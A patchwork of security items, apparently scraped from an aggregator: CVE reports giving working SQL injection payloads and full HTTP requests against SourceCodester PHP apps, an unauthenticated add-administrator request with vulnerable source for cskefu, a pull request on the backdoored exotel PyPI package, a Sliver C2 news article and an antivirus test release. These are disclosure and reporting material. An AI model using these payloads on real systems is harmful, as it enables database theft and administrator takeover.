Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the Id parameter at /librarian/studentdetails.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/studentdetails.php

Vulnerability location: /LMS/librarian/studentdetails.php?id=, id

\[+\] Payload: /LMS/librarian/studentdetails.php?id=-1002416%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /LMS/librarian/studentdetails.php?id\=\-1002416%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close

CVE-2022-36704: bug_report/SQLi-1.md at main · k0xx11/bug_report

The exotel (aka exotel-py) package in PyPI as of 0.1.6 includes a code execution backdoor inserted by a third party.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 8 Commits 2 Checks 1 Files changed

**Conversation**

**Description**

Version 0.1.6 of exotel package was released 2 hours ago (with the last release 0.1.5 happening in 2017).

Version 0.1.6 has malicious code in setup.py. Lock version of the package to last known good, 0.1.5 as a hotfix.

Ref https://pypi.org/project/exotel/0.1.6/#history

**Checklist**

*   I have reviewed the contributing guidelines.
*   I have included unit tests for my changes or additions.
*   I have successfully run make test-docker with my changes.
*   I have manually tested all relevant modes of the change in this PR.
*   I have updated the documentation.
*   I have updated the changelog.

**Questions or Comments**

Thanks for submitting this. I reviewed 0.1.6 and I do see the requests to two Russian-owned domains, with Windows-hosts being the infection target. Are you aware of any known CVE for this?

I've sent a request to PyPI to have the Exotel 0.1.6 removed. Thanks again for raising this so quickly.

We've also notified PyPi about the issue

@jertel Since the dependency is unmaintained and only contains about 5 post request functions, maybe it's worth dropping the dependency entirely and implementing support directly inside elastalert itself?  
Additionally the package is only used inside the exotel alerter, so maybe a suitable spot for the code would be inside that alerter.  
A side discussion here is maybe making alerter dependencies optional? Then unless an alerter type is specifically used, the dependencies wouldn't even get pulled in, thereby reducing chances of these kinds of incidents affecting all users?

Implementing the Exotel integration directly into ElastAlert2 exotel.py file is fine with me, if you are up to submitting the PR. Optional dependencies would reduce risk but will still cause code scanners to trigger, simply by having the python code exist, even if the main codebase didn't include that module. So to avoid the code scanners from triggering you'd have to dynamically pull down the alerters from the Internet. I'm not opposed to the idea but it would be a significant change.

Version 0.1.6 got deleted just now.

> Today we received reports of a phishing campaign targeting PyPI users. This is the first known phishing attack against PyPI.  
> /--/  
> At this time, the malicious releases that we are aware of are:- exotel==0.1.6  
> https://twitter.com/pypi/status/1562442188285308929

CVE-2022-38792: Pin exotel dependency to 0.1.5 due to security issue in 0.1.6 by anroots-tw · Pull Request #931 · jertel/elastalert2

Threat Roundup for August 19 to August 26

Microsoft and others say they have observed nation-state actors, ransomware purveyors, and assorted cybercriminals pivoting to an open source attack-emulation tool in recent campaigns.

Enterprise security teams, which over the years have honed their ability to detect the use of Cobalt Strike by adversaries, may also want to keep an eye out for "Sliver." It's an open source command-and-control (C2) framework that adversaries have increasingly begun integrating into their attack chains.

"What we think is driving the trend is increased knowledge of Sliver within offensive security communities, coupled with the massive focus on Cobalt Strike \[by defenders\]," says Josh Hopkins, research lead at Team Cymru. "Defenders are now having more and more successes in detecting and mitigating against Cobalt Strike. So, the transition away from Cobalt Strike to frameworks like Sliver is to be expected," he says.

Security researchers from Microsoft this week warned about observing nation-state actors, ransomware and extortion groups, and other threat actors using Sliver along with — or often as a replacement for — Cobalt Strike in various campaigns. Among them is DEV-0237 (aka FIN12), a financially motivated threat actor associated with the Ryuk, Conti, and Hive ransomware families; and several groups engaged in human-operated ransomware attacks, Microsoft said.

**Growing Use**

Earlier this year, Team Cymru reported observing Sliver being used in campaigns targeting organizations in multiple sectors, including government, research, telecom, and higher education. One campaign, between Feb. 3 and March 4, involved a Russian-hosted attack infrastructure, while another targeted government entities in Pakistan and Turkey. In many of these attacks, Team Cymru observed Sliver being used as part of the initial infection tool chain to deliver ransomware. In other instances, the threat intelligence firm found Sliver being used in opportunistic attacks involving potential exploitation of Log4j and VMware Horizon vulnerabilities.

Researchers from BishopFox developed and released Sliver, as an open source alternative to Cobalt Strike, in 2019. The framework is designed to give red-teamers and penetration testers a way to emulate the behavior of embedded threat actors in their environments. But as with Cobalt Strike, these same features also make it an attractive threat actor tool.

**An Attractive Alternative for Adversaries**

Sliver is written in the Go programming language (Golang), and therefore can be used across multiple operating system environments, including Windows, macOS, and Linux. Security teams can use Sliver to generate implants as Shellcode, Executable, Shared library/DLL, and as-a-Service, Microsoft said. Researchers added that Golang helps adversaries also because of the relatively limited tooling available for reverse engineering of Go binaries.

Sliver also supports smaller payloads — or stagers — with a handful of features that allow operators to retrieve and launch a full implant. 

"Stagers are used by many C2 frameworks to minimize the malicious code that's included in an initial payload (for example, in a phishing email)," Microsoft said. "This can make file-based detection more challenging."

Sliver also offers many more built-in modules than Cobalt Strike, says Andy Gill, adversarial engineer at Lares Consulting; these built-in capabilities make it easier for threat actors to exploit systems and leverage tooling to facilitate access, Gill says. Cobalt Strike, in contrast, is more of a bring-your-own payload/module tool.

"Sliver lowers the barrier of entry for attackers. \[It\] offers more customization in terms of payload delivery and ways of adapting attacks to evade defenses," he notes. 

But the most appealing factor for threat actors currently is its relative obscurity and the lack of work that has been undertaken — so far, at least — in building detections for Sliver, Hopkins from Team Cymru says. "Sliver has a lot of the same capabilities as Cobalt Strike, but without such a large spotlight being shone on it," he says. This has created a potential gap in detection coverage that some attackers are now trying to exploit.

And finally, the fact that it's free, open source, and available on GitHub also makes Sliver attractive compared to Cobalt Strike, which is commercial and therefore requires threat actors to crack the license mechanism each time a new version is released, Gill says.

**Cobalt Strike Remains Gold Standard — but Attackers Have Other Frameworks**

At the same time, it would be a big mistake for organizations to discount adversarial use of Cobalt Strike, researchers warn. 

In the first quarter of this year, for instance, Team Cymru observed some 143 Sliver samples that were likely being used as a first-stage tool in attack campaigns — compared with 4,455 samples of Cobalt Strike being used for potentially malicious purposes. 

"Defenders would be unwise to take their eyes off Cobalt Strike," Hopkins says. "Cobalt Strike is synonymous with — and the gold standard of — command-and-control networks."

Sometimes, the tools are used in tandem. Researchers at Intel 471 earlier this year observed Sliver being deployed along with Cobalt Strike, Metasploit, and the IcedID banking Trojan via a new loader called "Bumblebee". The company's chief intelligence officer Michael DeBolt says the framework has one feature that likely makes it especially useful for threat actors. 

"Sliver has a lot of features, \[but\] one that might be especially useful is its ability to limit execution to specific time frames, hosts, domain-joined machines, or users," he says "This feature can prevent the implant from executing in unintended environments, such as sandboxes, which aids against detection."

Sliver is just one of several C2 frameworks that attackers are using as alternatives to Cobalt Strike. Researchers from Intel 471, for instance, recently added detection for a legitimate red-teaming tool called Brute Ratel, after observing some threat actors using it for C2 purposes. 

Earlier this year, Palo Alto Networks' Unit 42 threat-hunting team uncovered what appeared to be Russia's notorious APT29 (aka Cozy Bear) using Brute Ratel in an attack campaign. 

Meanwhile, Gills from Lares pointed to Posh2, a C2 framework which, though not new, offers threat actors a chance of evading Cobalt Strike-centric detection mechanisms. And Hopkins from Team Cymru says his company is currently tracking a C2 framework called "Mythic" following some initial indications of adoption within the threat-actor community.  

Frameworks tend to vary in capabilities such as lateral movement, injection, and call out, Gill says. 

"\[So\], from a defensive standpoint, operators are better off profiling and generating signatures for techniques than analyzing specific C2 frameworks," he notes.

'Sliver' Emerges as Cobalt Strike Alternative for Malicious C2

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Six out of the eight products achieved an "A" rating or higher for blocking malware attacks. Reports are provided to the community for free.

**AUSTIN, Texas – Aug. 25, 2022** — CyberRatings.org, the nonprofit entity dedicated to providing transparency on cybersecurity product efficacy, has published results of its Q2 2022 Endpoint Protection Comparative Test.

Focused on endpoint products that feature antivirus protection, the products tested were Avast Free Antivirus, AVG AntiVirus Free, ESET Internet Security, McAfee Total Protection, Norton 360, Microsoft Defender, Sophos Home Premium and Trend Micro Maximum Security.

“The bad guys are getting bolder and malware / ransomware campaigns continue to get more sophisticated,” said Vikram Phatak, CEO of CyberRatings.org. “Most infections occur in the first few hours after a new campaign is launched. The time it takes for a security product to block the attack matters a lot,” adds Phatak. “That is why we tested not only how much malware a product blocks, but how _quickly_ it blocks an attack.”

Over 40,000 live tests were performed on each product, providing a ±0.49% margin of error. Trend Micro Maximum Security offered the most protection, blocking 97.97% of malware. Sophos Home Premium provided the second-highest protection, blocking 97.47%, followed by Microsoft Defender at 97.13%. Sophos was the quickest to add protection for previously unblocked malware, closely followed by Trend Micro.

With more businesses embracing remote work, a user’s protection is likely limited to the web browser and their endpoint protection product. Therefore, it’s important to be informed about which products are performing as advertised.

The Comparative Test Reports provide metrics for products blocking malware over time, average time a product added protection, and average time it took a product to add protection.

The test was funded by CyberRatings.org and no vendor paid to be in or out of the test. As a service to the community, CyberRatings.org is providing these reports for free.  

The following endpoint protection / antivirus products were tested:  

  

*   Avast Free Antivirus – v22.4.6011 (build 22.4.7175.725)
*   AVG AntiVirus Free – v22.4.3231 (build 22.4.7175.725)
*   ESET Internet Security – v15.1.12.0
*   McAfee Total Protection – v16.0 R46
*   Norton 360 (latest updates)
*   Sophos Home Premium – v4.1.0
*   Trend Micro Maximum Security – v17.7.1243
*   Windows Defender – Antimalware Client v4.18.2203.5

**Additional Resources**

*   Follow CyberRatings.org on Twitter
*   Follow CyberRatings.org on LinkedIn

**About CyberRatings.org**   
CyberRatings.org is a non-profit 501(c)6 entity dedicated to quantifying cyber risk and providing transparency on cybersecurity product efficacy through testing and ratings programs. To become a member, visit www.cyberratings.org

Endpoint Protection / Antivirus Products Tested for Malware Protection

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_category

Vulnerability location: /tss/classes/Master.php?f=delete\_category, id

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36678: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/?page=user/manage\_user&id=

Vulnerability location: /tss/admin/?page=user/manage\_user&id=, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/?page=user/manage\_user&id=-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /tss/admin/?page\=user/manage\_user&id\=\-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

CVE-2022-36679: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_student.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_student

Vulnerability location: /tss/classes/Master.php?f=delete\_student, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`student\_list\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_student HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36682: bug_report/SQLi-4.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_account.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_account

Vulnerability location: /tss/classes/Master.php?f=delete\_account, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`accounts\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_account HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#windows